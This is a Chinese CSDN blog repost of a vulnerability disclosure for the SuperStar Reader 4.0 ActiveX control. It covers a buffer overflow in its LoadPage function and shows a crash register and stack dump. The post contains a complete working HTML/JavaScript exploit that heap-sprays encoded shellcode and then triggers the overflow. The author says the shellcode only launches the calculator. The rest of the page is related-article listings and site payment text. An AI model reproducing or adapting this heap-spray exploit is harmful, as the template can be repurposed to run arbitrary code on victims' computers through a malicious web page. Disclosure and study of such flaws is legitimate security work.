超星浏览器4.0漏洞0day & Exp

最新推荐文章于 2024-07-29 11:53:27 发布
最新推荐文章于 2024-07-29 11:53:27 发布
阅读量276 收藏
点赞数
文章标签: javascript ViewUI
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_33912246/article/details/85166544
版权
文章作者:friddy
信息来源:邪恶八进制信息安全团队( [url]www.eviloctal.com[/url]
注:文章首发Friddy的罐子,后由原创作者友情提交到邪恶八进制信息安全团队讨论组,转载请著名首发站点。
本文章只含有漏洞存在的证明,效果是运行计算器的程序,不含有***性代码!
去年11月出的漏洞是在target.Register(ok,buffer)上,这次的缓冲区溢出出在target.LoadPage(buffer ,1 ,1 ,1)
漏洞位置:clsid:7F5E27CE-4A5C-11D3-9232-0000B48A05B2的LoadPage函数发生缓冲区溢出
漏洞告警: ACCESS_VIOLATION
Disasm: 41414141    ?????    ()

寄存器状态: 
EIP 41414141
EAX BAADF000
EBX 00000000
ECX 00000000
EDX 00B36F48 -> 016E9D0C
EDI 0013E084 -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
ESI 0013E39C -> 00000000
EBP 00B36F48 -> 016E9D0C
ESP 0013D85C -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
ArgDump: 
EBP+8    BAADF00D
EBP+12    00000000
EBP+16    BAADF00D
EBP+20    BAADF00D
EBP+24    BAADF00D
EBP+28    BAADF00D
Stack Dump: 
13D85C 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  [................]
13D86C 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  [................]
13D87C 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  [................]
13D88C 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  [................]
13D89C 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  [................]
漏洞利用程序: 
<object classid="clsid:7F5E27CE-4A5C-11D3-9232-0000B48A05B2" id='target'></object>
<P>Made By Friddy QQ:568623
<P>[url]http://www.friddy.cn[/url]
<SCRIPT language="javascript">
var shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");
var bigblock = unescape("%u9090%u9090");
var headersize = 20;
var slackspace = headersize+shellcode.length;//总长度
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (x=0; x<300; x++) memory[x] = block + shellcode;
var buffer = '';
while (buffer.length < 3092) buffer+="\x0a\x0a\x0a\x0a";
target.LoadPage(buffer ,1 ,1 ,1);//这次出问题的是LoadPage.不是Register了
</script>
weixin_33912246
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
超星阅读器ActiveX缓冲区溢出漏洞利用-LoadPage
jiangmingfu的专栏
01-09 1254
<br /><br />超星阅读器4.0漏洞利用过程:<br />1.由于是缓冲区溢出,最开始我想到的利用方式"jmp esp"<br />   0---------------------256---------260-----------268--------------<br />   |       填充NOP         |  jmp esp |   数据填充  |    shellcode<br />   -------------------------------------------
超星图书浏览器 4.0 简体中文标准版
07-08
超星图书浏览器 4.0 简体中文标准版超星图书浏览器 4.0 简体中文标准版
超星图书浏览器(SSReader) V4.0 简体中文标准版.rar
12-02
阅读pdg格式的工具,超星图书浏览器(SSReader) V4.0 简体中文标准版.rar
超星0DAY
jahn的专栏
10-17 811
来源:7jdgs blog又是一个0day0day年年有,今天特别多呀。声明一下,不是偶fuzz到的。。。 感谢精灵超星阅览器(SSReader)是超星公司拥有自主知识产权的图书阅览器,是专门针对数字图书的阅览、下载、打印、版权保护和下载计费而研究开发的。经过多年不断改进,SSReader现已发展到3.73版本,下载量已经突破1500万次,是国内外用户数量最多的专用图书阅览器之一。 wi
HeapSpray+ROP绕过IE8的DEP防护 ——堆喷射技术利用超星漏洞
huhu2017的专栏
08-07 6058
堆喷射技术已经发展很多个年头了,相关的研究也挺多的,虽然现在Win7、Win8系统下的利用越来越难,但是该技术仍然是可用的,比如最近新出的IE8 use after free漏洞(CVE-2013-1347),Metasploit里的利用代码就是使用堆喷技术及ROP实现Shellcode的布置和绕过DEP防护的,网上有关的资料不多,0Day2书中有关的内容并不多,只是简单介绍了HeapSpray技
缓冲区溢出漏洞
cyynid的博客
02-25 3987
在计算机操作系统中,“缓冲区”是指内存空间中用来存储程序运行时临时数据的一片大小有限并且连续的内存区域。根据程序中内存的分配方式和使用目的,缓冲区一般可分为栈和堆两种类型。C语言程序中定义的数组就是一种最常见的栈缓冲区。缓冲区溢出漏洞,作为软件中最容易发生的一类漏洞,其形成原理就是:当程序在处理用户数据时,未能对其大小进行恰当的限制,或者在进行拷贝、填充时没对这些数据限定边界,导致实际操作的数据大小超过了内存中目标缓冲区的大小,使得内存中一些关键数据被覆盖、从而引发安全问题。
某平台后台系统存在任意账号密码重置漏洞
李熠专用博客_白帽子一枚,人称低危终结者
11-02 1684
漏洞发现 进入该后台地址,发现有忘记密码入口 点击进入“忘记密码页面”,随手输入admin,显示出了 隐藏的手机号,需要发送验证码才能重置密码。 我的专业性告诉我,这里可能存在任意密码重置漏洞,于是尝试利用。 漏洞利用 点击“发送验证码”按钮,随便输入验证码和密码 ,此时,我并不知道验证码是多少位的,理论上,少于5位都容易被破解。于是我利用BurpSuit抓包,先尝试4位数的验证码,并且爆破。 由于成功失败返回内容长度一样,当时不知道是否爆破成功,等待片刻,输入重置的密码,发现可以登录。 漏洞危害
文件上传漏洞 大总结
algae
05-01 580
1.1 前端JavaScript检测 2.1 后端检测文件类型 2.1.1 检测content-type 2.1.2 检测文件头判断文件类型 2.2 后端检测文件扩展名 2.2.1 黑名单检测 2.2.2 白名单检测 2.3 后端检测文件内容 2.3....
%u8001%u5A46 %u4E0D%u8981%u751F%u6C14%u4E86%uFF01%uFF01%uFF01
weixin_34254823的博客
04-19 1万+
%u8001%u5A46%uFF1A %u4E0D%u8981%u751F%u6C14%u4E86%uFF0C%u751F%u6C14%u5BF9%u8EAB%u4F53%u4E0D%u597D%u7684%uFF0C%u800C%u4E14%u4F60%u751F%u6C14%u7684%u65F6%u5019%u5C31%u4E0D%u53EF%u7231%u...
渗透测试神器CS(4.0)的使用
热门推荐
世间繁华梦一出
12-27 2万+
CSCS简介 CS简介 Cobalt Strike是一款渗透测试神器,常被业界人称为CS神器。Cobalt Strike已经不再使用MSF而是作为单独的平台使用,它分为客户端与服务端,服务端是一个,客户端可以有多个,可被团队进行分布式协团操作。 CobaltStrike集成了端口转发、扫描多模式端口Listener、Windows exe程序生成、Windows dll动态链接库生成、java程序生成、office宏代码生成,包括站点克隆获取浏览器的相关信息等。 ...
04_python爬虫爬取超星回放
qq_43621944的博客
05-01 1324
import requests as re from bs4 import BeautifulSoup import time class VideoGet: def __init__(self): #初始化, 地址基本没用, 后面会重新设置 self.url = 'https://www.4kdy.org/TV/OM/juemingdushi1/jue...
简单分析了网马样本
yd0str
06-04 4243
格式有点乱,利用的漏洞也没那么新,大家随便看看吧,欢迎交流~ 一、漏洞信息收集 来源 http://a.prir.asia:82/sklh.html   Response contentSHA-256 0fde420792f009477206c0914d1275c0562706e431dcac4b57354ca630a0df47   从代码中的classid="clsid:f6
高校图书馆管理系统 php 漏洞,某通用图书馆管理系统SQL注入_MySQL
weixin_39761422的博客
04-05 368
某通用图书馆管理系统SQL注入,主要是某个某页面存在SQL注射。sqlmap.py -u http://219.242.65.10/fsweb/MakeIntert.aspx?ID=123 --is-dbasqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GET...
在Vue程序中,如何检测用户的登录状态并跳转到对应页面
exlink2012的专栏
07-25 409
通过以上步骤,你可以在Vue应用程序中检测用户的登录状态,并在用户尝试访问受保护页面时跳转到登录页面。同时,在用户登录和登出后,你可以根据需要跳转到相应的页面。
我们的前端开发逆天了!1 小时搞定了新网站,还跟我说 “不要钱”
最新发布
努力做最接地气的编程干货分享,感谢关注
07-29 594
本文将带你了解一个新的 Web 框架 **Astro**,并手把手带你使用 Astro 搭建一个属于自己的站点,用过的都说真香!
超星后台管理系统 漏洞
08-27
根据提供的引用内容,超星后台管理系统可能存在多个漏洞,包括代码注入漏洞、XSS漏洞和SSRF漏洞。 代码注入漏洞是指攻击者通过在在线订单系统中输入恶意代码触发漏洞,从而获得管理员的cookie绕过httponly限制。这种漏洞需要在管理员处理订单时才会被触发,属于被动式攻击,并且利用起来比较困难[1]。 XSS漏洞是指存在跨站脚本攻击漏洞,管理员登录后触发该漏洞,攻击者可以绕过过滤机制,使用户浏览器不拦截恶意代码。这种漏洞可能需要绕过无痕浏览等安全措施才能成功利用。 SSRF漏洞是一种由服务端发起请求的安全漏洞,攻击者可以构造请求从外部无法访问的内部系统中获取信息。超星后台管理系统中可能存在的SSRF漏洞的目标一般是与外网隔离的内部系统。 需要注意的是,以上只是一种推测,具体是否存在漏洞还需要进行详细的安全评估和测试。如果您对超星后台管理系统的漏洞有更具体的问题,建议您进一步提供详细信息以便更准确地回答。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [XSS漏洞详解](https://blog.csdn.net/m0_62619269/article/details/125042735)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值